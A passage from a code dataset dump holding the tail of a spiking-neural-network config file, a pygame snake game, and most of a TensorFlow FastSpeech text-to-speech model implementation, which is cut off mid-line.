'exp_prob': 1.0,\n 'out_prob': 1.0,\n 'A_plus': 1.0,\n 'A_minus': 1.0,\n 'std': 1.0,\n 'displace': 1.0,\n 'maxDt': 1.0,\n 'w_max_mult': 1.0,\n 'w_min_mult': 1.0,\n 'conn_dist': 
1.0,\n}\n# ATTR_STEPS_BASE = {\n# 'out_weight': 1.0,\n# 'mushroom_weight': 1.0,\n# 'expand': 5.0,\n# 'exp_prob': 0.05,\n# 'out_prob': 0.05,\n# 'A_plus': 0.1,\n# 'A_minus': 0.1,\n# 'std': 0.5,\n# 'displace': 0.01,\n# 'maxDt': 10.0,\n# 'w_max_mult': 0.05,\n# 'w_min_mult': 0.05,\n# 'conn_dist': 5.0,\n# }\n# cheap attempt to scale the variance for normal-distributed mutation\nATTR_STEPS_BASE = {\n k: ATTR_STEPS_DEVS[k] * ((ATTR_RANGES[k][1] - ATTR_RANGES[k][0]) / 3.14159)\n if len(ATTR_RANGES[k]) > 1 else\n ATTR_STEPS_DEVS[k] * ((ATTR_RANGES[k][0]) / 3.14159)\n for k in ATTR_RANGES\n}\n\nATTR_STEPS = {k: ATTR_STEPS_BASE[k] for k in ATTR_STEPS_BASE}\n\n# for s in ATTRS:\n# if s.startswith('gabor_weight'):\n# ATTR_RANGES[s] = GABOR_WEIGHT_RANGE\n\n\n### Neuron types\nNEURON_CLASS = 'IF_curr_exp'\nGABOR_CLASS = 'IF_curr_exp'\nMUSHROOM_CLASS = 'IF_curr_exp_i' # i\nINH_MUSHROOM_CLASS = 'IF_curr_exp'\nOUTPUT_CLASS = 'IF_curr_exp_i'\nINH_OUTPUT_CLASS = 'IF_curr_exp'\n\n### Neuron configuration\nVTHRESH = -55.0\nBASE_PARAMS = {\n 'cm': 0.1, # nF\n 'v_reset': -70., # mV\n 'v_rest': -65., # mV\n 'tau_m': 10., # ms\n 'tau_refrac': 5., # ms\n 'tau_syn_E': 2., # ms\n 'tau_syn_I': 5., # ms\n 'i_offset': 0.\n}\n\nINH_PARAMS = BASE_PARAMS.copy()\nINH_PARAMS['v_thresh'] = -55.0\nINH_PARAMS['tau_m'] = 16.0\n\ntau_thresh = 30.0\n#tau_thresh = 50.0\nmult_thresh = 1.8\n# mult_thresh = 0.00000000001\nmult_thresh = 1.000000000000000001\n\nGABOR_PARAMS = BASE_PARAMS.copy()\nMUSHROOM_PARAMS = BASE_PARAMS.copy()\nMUSHROOM_PARAMS['v_threshold'] = VTHRESH # mV\nMUSHROOM_PARAMS['v_thresh_adapt'] = MUSHROOM_PARAMS['v_threshold']\nMUSHROOM_PARAMS['tau_threshold'] = tau_thresh\nMUSHROOM_PARAMS['w_threshold'] = mult_thresh\nMUSHROOM_PARAMS['tau_syn_E'] = 5.\nMUSHROOM_PARAMS['tau_syn_I'] = 5.\nMUSHROOM_PARAMS['cm'] = 1.0\nMUSHROOM_PARAMS['tau_m'] = 20.0\n\nINH_MUSHROOM_PARAMS = INH_PARAMS.copy()\nINH_OUTPUT_PARAMS = INH_PARAMS.copy()\nGAIN_CONTROL_PARAMS = BASE_PARAMS.copy()\n\ntau_thresh = 50.0\nmult_thresh = 1.8\nmult_thresh = 1.00000000000000000000001\n\nOUTPUT_PARAMS = BASE_PARAMS.copy()\nOUTPUT_PARAMS['v_threshold'] = VTHRESH # mV\nOUTPUT_PARAMS['v_thresh_adapt'] = OUTPUT_PARAMS['v_threshold']\nOUTPUT_PARAMS['tau_threshold'] = tau_thresh\nOUTPUT_PARAMS['w_threshold'] = mult_thresh\nOUTPUT_PARAMS['tau_syn_E'] = 5.\nOUTPUT_PARAMS['tau_syn_I'] = 5.\nOUTPUT_PARAMS['cm'] = 1.0\nOUTPUT_PARAMS['tau_m'] = 20.0\nOUTPUT_PARAMS['tau_syn_S'] = 5.\n\n\n\n\nRECORD_SPIKES = [\n # 'input',\n # 'gabor',\n# 'gain_control',\n# 'mushroom',\n # 'inh_mushroom',\n 'output',\n # 'inh_output',\n]\nif TEST_MUSHROOM and 'mushroom' not in RECORD_SPIKES:\n RECORD_SPIKES.append('mushroom')\n\nRECORD_WEIGHTS = [\n # 'input to gabor',\n # 'gabor to mushroom',\n # 'input to mushroom',\n# 'mushroom to output'\n]\n\nRECORD_VOLTAGES = [\n 'output',\n# 'gain_control'\n]\n\nSAVE_INITIAL_WEIGHTS = bool(1)\n\n# STDP_MECH = 'STDPMechanism'\n#\n# time_dep = 'SpikePairRule'\n# time_dep_vars = dict(\n# tau_plus = 20.0,\n# tau_minus = 20.0,\n# A_plus = 0.01,\n# A_minus = 0.01,\n# )\n#\n# weight_dep = 'AdditiveWeightDependence'\n# weight_dep_vars = dict(\n# )\n# w_min_mult = 0.0\n# w_max_mult = 1.2\n\nSTDP_MECH = 'MySTDPMechanism'\n\nTIME_DEP = 'MyTemporalDependence'\nTIME_DEP_VARS = {\n \"A_plus\": 0.10,\n \"A_minus\": 0.01,\n \"tau_plus\": 5.0,\n \"tau_plus1\": 5.0,\n \"tau_minus\": 80.0,\n \"max_learn_t\": N_CLASSES * N_SAMPLES * SAMPLE_DT * N_EPOCHS + 1.0,\n}\n\nWEIGHT_DEP = 'MyWeightDependence'\nWEIGHT_DEP_VARS = dict(\n)\nW_MIN_MULT = 0#-2.0\nW_MAX_MULT = 
1.2\n\n","repo_name":"chanokin/l2l-omniglot","sub_path":"omnigloter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32616188501","text":"#!/usr/bin/python\n\nfrom pygame.locals import *\nfrom random import randint\nimport pygame\nimport time\n \nclass Apple:\n x = 0\n y = 0\n step = 44\n \n def __init__(self,x,y):\n self.x = x * self.step\n self.y = y * self.step\n \n def draw(self, surface, image):\n surface.blit(image,(self.x, self.y)) \n \n \nclass Player:\n x = [0]\n y = [0]\n step = 44\n direction = 0\n length = 3\n \n updateCountMax = 2\n updateCount = 0\n \n def __init__(self, length):\n self.length = length\n for i in range(0,2000):\n self.x.append(-100)\n self.y.append(-100)\n \n # initial positions, no collision.\n self.x[1] = 1*44\n self.x[2] = 2*44\n \n def update(self):\n \n self.updateCount = self.updateCount + 1\n if self.updateCount > self.updateCountMax:\n \n # update previous positions\n for i in range(self.length-1,0,-1):\n self.x[i] = self.x[i-1]\n self.y[i] = self.y[i-1]\n \n # update position of head of snake\n if self.direction == 0:\n self.x[0] = self.x[0] + self.step\n if self.direction == 1:\n self.x[0] = self.x[0] - self.step\n if self.direction == 2:\n self.y[0] = self.y[0] - self.step\n if self.direction == 3:\n self.y[0] = self.y[0] + self.step\n \n self.updateCount = 0\n \n \n def moveRight(self):\n self.direction = 0\n \n def moveLeft(self):\n self.direction = 1\n \n def moveUp(self):\n self.direction = 2\n \n def moveDown(self):\n self.direction = 3 \n \n def draw(self, surface, image):\n for i in range(0,self.length):\n surface.blit(image,(self.x[i],self.y[i])) \n \nclass Game:\n def isCollision(self,x1,y1,x2,y2,bsize):\n if x1 >= x2 and x1 <= x2 + bsize:\n if y1 >= y2 and y1 <= y2 + bsize:\n return True\n return False\n \nclass App:\n \n windowWidth = 800\n windowHeight = 600\n player = 0\n apple = 0\n \n def __init__(self):\n self._running = True\n self._display_surf = None\n self._image_surf = None\n self._apple_surf = None\n self.game = Game()\n\n","repo_name":"rkaggrawal/PythonScripts","sub_path":"python_scripts/bin_old/gameSnake.py","file_name":"gameSnake.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"25894053449","text":"import numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_tts.models import BaseModel\n\n\ndef get_initializer(initializer_range=0.02):\n \"\"\"Creates a `tf.initializers.truncated_normal` with the given range.\n\n Args:\n initializer_range: float, initializer range for stddev.\n\n Returns:\n TruncatedNormal initializer with stddev = `initializer_range`.\n\n \"\"\"\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n\n\ndef gelu(x):\n \"\"\"Gaussian Error Linear unit.\"\"\"\n cdf = 0.5 * (1.0 + tf.math.erf(x / tf.math.sqrt(2.0)))\n return x * cdf\n\n\ndef gelu_new(x):\n \"\"\"Smoother gaussian Error Linear Unit.\"\"\"\n cdf = 0.5 * (1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf\n\n\ndef swish(x):\n \"\"\"Swish activation function.\"\"\"\n return tf.nn.swish(x)\n\n\ndef mish(x):\n return x * tf.math.tanh(tf.math.softplus(x))\n\n\nACT2FN = {\n \"identity\": tf.keras.layers.Activation(\"linear\"),\n \"tanh\": tf.keras.layers.Activation(\"tanh\"),\n \"gelu\": tf.keras.layers.Activation(gelu),\n \"relu\": tf.keras.activations.relu,\n \"swish\": tf.keras.layers.Activation(swish),\n \"gelu_new\": tf.keras.layers.Activation(gelu_new),\n \"mish\": tf.keras.layers.Activation(mish),\n}\n\n\nclass TFEmbedding(tf.keras.layers.Embedding):\n \"\"\"Faster version of embedding.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def call(self, inputs):\n inputs = tf.cast(inputs, tf.int32)\n outputs = tf.gather(self.embeddings, inputs)\n return outputs\n\n\nclass TFFastSpeechEmbeddings(tf.keras.layers.Layer):\n \"\"\"Construct charactor/phoneme/positional/speaker embeddings.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.vocab_size = config.vocab_size\n self.hidden_size = config.encoder_self_attention_params.hidden_size\n self.initializer_range = config.initializer_range\n self.config = config\n\n self.position_embeddings = TFEmbedding(\n config.max_position_embeddings + 1,\n self.hidden_size,\n weights=[\n self._sincos_embedding(\n self.hidden_size, self.config.max_position_embeddings\n )\n ],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n if config.n_speakers > 1:\n self.encoder_speaker_embeddings = TFEmbedding(\n config.n_speakers,\n self.hidden_size,\n embeddings_initializer=get_initializer(self.initializer_range),\n name=\"speaker_embeddings\",\n )\n self.speaker_fc = tf.keras.layers.Dense(\n units=self.hidden_size, name=\"speaker_fc\"\n )\n\n def build(self, input_shape):\n \"\"\"Build shared charactor/phoneme embedding layers.\"\"\"\n with tf.name_scope(\"charactor_embeddings\"):\n self.charactor_embeddings = self.add_weight(\n \"weight\",\n shape=[self.vocab_size, self.hidden_size],\n initializer=get_initializer(self.initializer_range),\n )\n super().build(input_shape)\n\n def call(self, inputs, training=False):\n \"\"\"Get charactor embeddings of inputs.\n\n Args:\n 1. charactor, Tensor (int32) shape [batch_size, length].\n 2. 
speaker_id, Tensor (int32) shape [batch_size]\n Returns:\n Tensor (float32) shape [batch_size, length, embedding_size].\n\n \"\"\"\n return self._embedding(inputs, training=training)\n\n def _embedding(self, inputs, training=False):\n \"\"\"Applies embedding based on inputs tensor.\"\"\"\n input_ids, speaker_ids = inputs\n\n input_shape = tf.shape(input_ids)\n seq_length = input_shape[1]\n\n position_ids = tf.range(1, seq_length + 1, dtype=tf.int32)[tf.newaxis, :]\n\n # create embeddings\n inputs_embeds = tf.gather(self.charactor_embeddings, input_ids)\n position_embeddings = self.position_embeddings(position_ids)\n\n # sum embedding\n embeddings = inputs_embeds + tf.cast(position_embeddings, inputs_embeds.dtype)\n if self.config.n_speakers > 1:\n speaker_embeddings = self.encoder_speaker_embeddings(speaker_ids)\n speaker_features = tf.math.softplus(self.speaker_fc(speaker_embeddings))\n # extended speaker embeddings\n extended_speaker_features = speaker_features[:, tf.newaxis, :]\n embeddings += extended_speaker_features\n\n return embeddings\n\n def _sincos_embedding(\n self, hidden_size, max_positional_embedding,\n ):\n position_enc = np.array(\n [\n [\n pos / np.power(10000, 2.0 * (i // 2) / hidden_size)\n for i in range(hidden_size)\n ]\n for pos in range(max_positional_embedding + 1)\n ]\n )\n\n position_enc[:, 0::2] = np.sin(position_enc[:, 0::2])\n position_enc[:, 1::2] = np.cos(position_enc[:, 1::2])\n\n # pad embedding.\n position_enc[0] = 0.0\n\n return position_enc\n\n def resize_positional_embeddings(self, new_size):\n self.position_embeddings = TFEmbedding(\n new_size + 1,\n self.hidden_size,\n weights=[self._sincos_embedding(self.hidden_size, new_size)],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n\nclass TFFastSpeechSelfAttention(tf.keras.layers.Layer):\n \"\"\"Self attention module for fastspeech.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (config.hidden_size, config.num_attention_heads)\n )\n self.output_attentions = config.output_attentions\n self.num_attention_heads = config.num_attention_heads\n self.all_head_size = self.num_attention_heads * config.attention_head_size\n\n self.query = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"query\",\n )\n self.key = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"key\",\n )\n self.value = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"value\",\n )\n\n self.dropout = tf.keras.layers.Dropout(config.attention_probs_dropout_prob)\n self.config = config\n\n def transpose_for_scores(self, x, batch_size):\n \"\"\"Transpose to calculate attention scores.\"\"\"\n x = tf.reshape(\n x,\n (batch_size, -1, self.num_attention_heads, self.config.attention_head_size),\n )\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n batch_size = tf.shape(hidden_states)[0]\n mixed_query_layer = self.query(hidden_states)\n mixed_key_layer = self.key(hidden_states)\n mixed_value_layer = self.value(hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)\n key_layer = 
self.transpose_for_scores(mixed_key_layer, batch_size)\n value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)\n\n attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)\n dk = tf.cast(\n tf.shape(key_layer)[-1], attention_scores.dtype\n ) # scale attention_scores\n attention_scores = attention_scores / tf.math.sqrt(dk)\n\n if attention_mask is not None:\n # extended_attention_masks for self attention encoder.\n extended_attention_mask = attention_mask[:, tf.newaxis, tf.newaxis, :]\n extended_attention_mask = tf.cast(\n extended_attention_mask, attention_scores.dtype\n )\n extended_attention_mask = (1.0 - extended_attention_mask) * -1e9\n attention_scores = attention_scores + extended_attention_mask\n\n # Normalize the attention scores to probabilities.\n attention_probs = tf.nn.softmax(attention_scores, axis=-1)\n attention_probs = self.dropout(attention_probs, training=training)\n\n context_layer = tf.matmul(attention_probs, value_layer)\n context_layer = tf.transpose(context_layer, perm=[0, 2, 1, 3])\n context_layer = tf.reshape(context_layer, (batch_size, -1, self.all_head_size))\n\n outputs = (\n (context_layer, attention_probs)\n if self.output_attentions\n else (context_layer,)\n )\n return outputs\n\n\nclass TFFastSpeechSelfOutput(tf.keras.layers.Layer):\n \"\"\"Fastspeech output of self attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.dense = tf.keras.layers.Dense(\n config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.LayerNorm = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm\"\n )\n self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, input_tensor = inputs\n\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states, training=training)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass TFFastSpeechAttention(tf.keras.layers.Layer):\n \"\"\"Fastspeech attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.self_attention = TFFastSpeechSelfAttention(config, name=\"self\")\n self.dense_output = TFFastSpeechSelfOutput(config, name=\"output\")\n\n def call(self, inputs, training=False):\n input_tensor, attention_mask = inputs\n\n self_outputs = self.self_attention(\n [input_tensor, attention_mask], training=training\n )\n attention_output = self.dense_output(\n [self_outputs[0], input_tensor], training=training\n )\n masked_attention_output = attention_output * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=attention_output.dtype\n )\n outputs = (masked_attention_output,) + self_outputs[\n 1:\n ] # add attentions if we output them\n return outputs\n\n\nclass TFFastSpeechIntermediate(tf.keras.layers.Layer):\n \"\"\"Intermediate representation module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv1d_1 = tf.keras.layers.Conv1D(\n config.intermediate_size,\n kernel_size=config.intermediate_kernel_size,\n kernel_initializer=get_initializer(config.initializer_range),\n padding=\"same\",\n name=\"conv1d_1\",\n )\n self.conv1d_2 = tf.keras.layers.Conv1D(\n config.hidden_size,\n kernel_size=config.intermediate_kernel_size,\n 
kernel_initializer=get_initializer(config.initializer_range),\n padding=\"same\",\n name=\"conv1d_2\",\n )\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = ACT2FN[config.hidden_act]\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def call(self, inputs):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n hidden_states = self.conv1d_1(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n hidden_states = self.conv1d_2(hidden_states)\n\n masked_hidden_states = hidden_states * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=hidden_states.dtype\n )\n return masked_hidden_states\n\n\nclass TFFastSpeechOutput(tf.keras.layers.Layer):\n \"\"\"Output module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.LayerNorm = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm\"\n )\n self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, input_tensor = inputs\n\n hidden_states = self.dropout(hidden_states, training=training)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass TFFastSpeechLayer(tf.keras.layers.Layer):\n \"\"\"Fastspeech module (FFT module on the paper).\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.attention = TFFastSpeechAttention(config, name=\"attention\")\n self.intermediate = TFFastSpeechIntermediate(config, name=\"intermediate\")\n self.bert_output = TFFastSpeechOutput(config, name=\"output\")\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n attention_outputs = self.attention(\n [hidden_states, attention_mask], training=training\n )\n attention_output = attention_outputs[0]\n intermediate_output = self.intermediate(\n [attention_output, attention_mask], training=training\n )\n layer_output = self.bert_output(\n [intermediate_output, attention_output], training=training\n )\n masked_layer_output = layer_output * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=layer_output.dtype\n )\n outputs = (masked_layer_output,) + attention_outputs[\n 1:\n ] # add attentions if we output them\n return outputs\n\n\nclass TFFastSpeechEncoder(tf.keras.layers.Layer):\n \"\"\"Fast Speech encoder module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.output_attentions = config.output_attentions\n self.output_hidden_states = config.output_hidden_states\n self.layer = [\n TFFastSpeechLayer(config, name=\"layer_._{}\".format(i))\n for i in range(config.num_hidden_layers)\n ]\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n all_hidden_states = ()\n all_attentions = ()\n for _, layer_module in enumerate(self.layer):\n if self.output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n layer_outputs = layer_module(\n [hidden_states, attention_mask], training=training\n )\n hidden_states = layer_outputs[0]\n\n if self.output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n # Add last layer\n if self.output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n outputs = (hidden_states,)\n if self.output_hidden_states:\n outputs = outputs + (all_hidden_states,)\n 
if self.output_attentions:\n outputs = outputs + (all_attentions,)\n return outputs # outputs, (hidden states), (attentions)\n\n\nclass TFFastSpeechDecoder(TFFastSpeechEncoder):\n \"\"\"Fast Speech decoder module.\"\"\"\n\n def __init__(self, config, **kwargs):\n self.is_compatible_encoder = kwargs.pop(\"is_compatible_encoder\", True)\n\n super().__init__(config, **kwargs)\n self.config = config\n\n # create decoder positional embedding\n self.decoder_positional_embeddings = TFEmbedding(\n config.max_position_embeddings + 1,\n config.hidden_size,\n weights=[self._sincos_embedding()],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n if self.is_compatible_encoder is False:\n self.project_compatible_decoder = tf.keras.layers.Dense(\n units=config.hidden_size, name=\"project_compatible_decoder\"\n )\n\n if config.n_speakers > 1:\n self.decoder_speaker_embeddings = TFEmbedding(\n config.n_speakers,\n config.hidden_size,\n embeddings_initializer=get_initializer(config.initializer_range),\n name=\"speaker_embeddings\",\n )\n self.speaker_fc = tf.keras.layers.Dense(\n units=config.hidden_size, name=\"speaker_fc\"\n )\n\n def call(self, inputs, training=False):\n hidden_states, speaker_ids, encoder_mask, decoder_pos = inputs\n\n if self.is_compatible_encoder is False:\n hidden_states = self.project_compatible_decoder(hidden_states)\n\n # calculate new hidden states.\n hidden_states += tf.cast(\n self.decoder_positional_embeddings(decoder_pos), hidden_states.dtype\n )\n\n if self.config.n_speakers > 1:\n speaker_embeddings = self.decoder_speaker_embeddings(speaker_ids)\n speaker_features = tf.math.softplus(self.speaker_fc(speaker_embeddings))\n # extended speaker embeddings\n extended_speaker_features = speaker_features[:, tf.newaxis, :]\n hidden_states += extended_speaker_features\n\n return super().call([hidden_states, encoder_mask], training=training)\n\n def _sincos_embedding(self):\n position_enc = np.array(\n [\n [\n pos / np.power(10000, 2.0 * (i // 2) / self.config.hidden_size)\n for i in range(self.config.hidden_size)\n ]\n for pos in range(self.config.max_position_embeddings + 1)\n ]\n )\n\n position_enc[:, 0::2] = np.sin(position_enc[:, 0::2])\n position_enc[:, 1::2] = np.cos(position_enc[:, 1::2])\n\n # pad embedding.\n position_enc[0] = 0.0\n\n return position_enc\n\n\nclass TFTacotronPostnet(tf.keras.layers.Layer):\n \"\"\"Tacotron-2 postnet.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv_batch_norm = []\n for i in range(config.n_conv_postnet):\n conv = tf.keras.layers.Conv1D(\n filters=config.postnet_conv_filters\n if i < config.n_conv_postnet - 1\n else config.num_mels,\n kernel_size=config.postnet_conv_kernel_sizes,\n padding=\"same\",\n name=\"conv_._{}\".format(i),\n )\n batch_norm = tf.keras.layers.BatchNormalization(\n axis=-1, name=\"batch_norm_._{}\".format(i)\n )\n self.conv_batch_norm.append((conv, batch_norm))\n self.dropout = tf.keras.layers.Dropout(\n rate=config.postnet_dropout_rate, name=\"dropout\"\n )\n self.activation = [tf.nn.tanh] * (config.n_conv_postnet - 1) + [tf.identity]\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n outputs, mask = inputs\n extended_mask = tf.cast(tf.expand_dims(mask, axis=2), outputs.dtype)\n for i, (conv, bn) in enumerate(self.conv_batch_norm):\n outputs = conv(outputs)\n outputs = bn(outputs)\n outputs = self.activation[i](outputs)\n outputs = self.dropout(outputs, training=training)\n return outputs * extended_mask\n\n\nclass 
TFFastSpeechDurationPredictor(tf.keras.layers.Layer):\n \"\"\"FastSpeech duration predictor module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv_layers = []\n for i in range(config.num_duration_conv_layers):\n self.conv_layers.append(\n tf.keras.layers.Conv1D(\n config.duration_predictor_filters,\n config.duration_predictor_kernel_sizes,\n padding=\"same\",\n name=\"conv_._{}\".format(i),\n )\n )\n self.conv_layers.append(\n tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm_._{}\".format(i)\n )\n )\n self.conv_layers.append(tf.keras.layers.Activation(tf.nn.relu6))\n self.conv_layers.append(\n tf.keras.layers.Dropout(config.duration_predictor_dropout_probs)\n )\n self.conv_layers_sequence = tf.keras.Sequential(self.conv_layers)\n self.output_layer = tf.keras.layers.Dense(1)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n encoder_hidden_states, attention_mask = inputs\n attention_mask = tf.cast(\n tf.expand_dims(attention_mask, 2), encoder_hidden_states.dtype\n )\n\n # mask encoder hidden states\n masked_encoder_hidden_states = encoder_hidden_states * attention_mask\n\n # pass though first layer\n outputs = self.conv_layers_sequence(masked_encoder_hidden_states)\n outputs = self.output_layer(outputs)\n masked_outputs = outputs * attention_mask\n return tf.squeeze(tf.nn.relu6(masked_outputs), -1) # make sure positive value.\n\n\nclass TFFastSpeechLengthRegulator(tf.keras.layers.Layer):\n \"\"\"FastSpeech lengthregulator module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n self.enable_tflite_convertible = kwargs.pop(\"enable_tflite_convertible\", False)\n super().__init__(**kwargs)\n self.config = config\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\n Args:\n 1. encoder_hidden_states, Tensor (float32) shape [batch_size, length, hidden_size]\n 2. 
durations_gt, Tensor (float32/int32) shape [batch_size, length]\n \"\"\"\n encoder_hidden_states, durations_gt = inputs\n outputs, encoder_masks = self._length_regulator(\n encoder_hidden_states, durations_gt\n )\n return outputs, encoder_masks\n\n def _length_regulator(self, encoder_hidden_states, durations_gt):\n \"\"\"Length regulator logic.\"\"\"\n sum_durations = tf.reduce_sum(durations_gt, axis=-1) # [batch_size]\n max_durations = tf.reduce_max(sum_durations)\n\n input_shape = tf.shape(encoder_hidden_states)\n batch_size = input_shape[0]\n hidden_size = input_shape[-1]\n\n # initialize output hidden states and encoder masking.\n if self.enable_tflite_convertible:\n # There is only 1 batch in inference, so we don't have to use\n # `tf.While` op with 3-D output tensor.\n repeats = durations_gt[0]\n real_length = tf.reduce_sum(repeats)\n pad_size = max_durations - real_length\n # masks : [max_durations]\n masks = tf.sequence_mask([real_length], max_durations, dtype=tf.int32)\n repeat_encoder_hidden_states = tf.repeat(\n encoder_hidden_states[0], repeats=repeats, axis=0\n )\n repeat_encoder_hidden_states = tf.expand_dims(\n tf.pad(repeat_encoder_hidden_states, [[0, pad_size], [0, 0]]), 0\n ) # [1, max_durations, hidden_size]\n\n outputs = repeat_encoder_hidden_states\n encoder_masks = masks\n else:\n outputs = tf.zeros(\n shape=[0, max_durations, hidden_size], dtype=encoder_hidden_states.dtype\n )\n encoder_masks = tf.zeros(shape=[0, max_durations], dtype=tf.int32)\n\n def condition(\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ):\n return tf.less(i, batch_size)\n\n def body(\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ):\n repeats = durations_gt[i]\n real_length = tf.reduce_sum(repeats)\n pad_size = max_durations - real_length\n masks = tf.sequence_mask([real_length], max_durations, dtype=tf.int32)\n repeat_encoder_hidden_states = tf.repeat(\n encoder_hidden_states[i], repeats=repeats, axis=0\n )\n repeat_encoder_hidden_states = tf.expand_dims(\n tf.pad(repeat_encoder_hidden_states, [[0, pad_size], [0, 0]]), 0\n ) # [1, max_durations, hidden_size]\n outputs = tf.concat([outputs, repeat_encoder_hidden_states], axis=0)\n encoder_masks = tf.concat([encoder_masks, masks], axis=0)\n return [\n i + 1,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ]\n\n # initialize iteration i.\n i = tf.constant(0, dtype=tf.int32)\n _, _, outputs, encoder_masks, _, _, _, = tf.while_loop(\n condition,\n body,\n [\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ],\n shape_invariants=[\n i.get_shape(),\n batch_size.get_shape(),\n tf.TensorShape(\n [\n None,\n None,\n self.config.encoder_self_attention_params.hidden_size,\n ]\n ),\n tf.TensorShape([None, None]),\n encoder_hidden_states.get_shape(),\n durations_gt.get_shape(),\n max_durations.get_shape(),\n ],\n )\n\n return outputs, encoder_masks\n\n\nclass TFFastSpeech(BaseModel):\n \"\"\"TF Fastspeech module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init layers for fastspeech.\"\"\"\n self.enable_tflite_convertible = kwargs.pop(\"enable_tflite_convertible\", False)\n super().__init__(**kwargs)\n self.embeddings = TFFastSpeechEmbeddings(config, name=\"embeddings\")\n self.encoder = TFFastSpeechEncoder(\n config.encoder_self_attention_params, name=\"encoder\"\n )\n self.duration_predictor = 
